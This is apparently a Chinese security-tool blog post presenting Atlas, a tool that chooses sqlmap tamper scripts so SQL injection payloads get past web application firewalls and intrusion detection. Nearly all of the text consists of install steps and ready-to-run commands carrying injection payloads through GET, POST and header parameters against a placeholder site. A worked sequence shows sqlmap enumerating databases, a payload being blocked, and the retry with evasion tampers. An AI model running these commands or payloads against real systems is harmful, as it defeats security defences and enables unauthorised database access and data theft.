Atlas修改SQLMap tampers 绕过WAF/IDS/IPS

Atlas修改SQLMap tampers 绕过WAF/IDS/IPS

Atlas是一个开源工具,可以修改sqlmap tampers 绕过WAF / IDS / IPS,该工具基于返回的状态码。

Atlas安装方法

git clone https://github.com/m4ll0k/Atlas.git atlas
cd atlas
python atlas.py # python3+

用法

python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

注入点(带%%inject%%):

get:

python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

post:

python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

headers:

python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

连接tampers:

python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v

获取tampers列表:

python atlas.py -g

  1. 运行SQLMap:
python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3

Price_ASC') AND 8716=4837 AND ('yajr'='yajr 被WAF / IDS / IPS阻止,现在尝试使用Atlas:

python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v

在此刻:

python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,...

项目地址:

GitHub https://github.com/m4ll0k/Atlas

下载地址

雨苁网盘: https://w.ddosi.workers.dev

Leave a Reply

您的电子邮箱地址不会被公开。 必填项已用 * 标注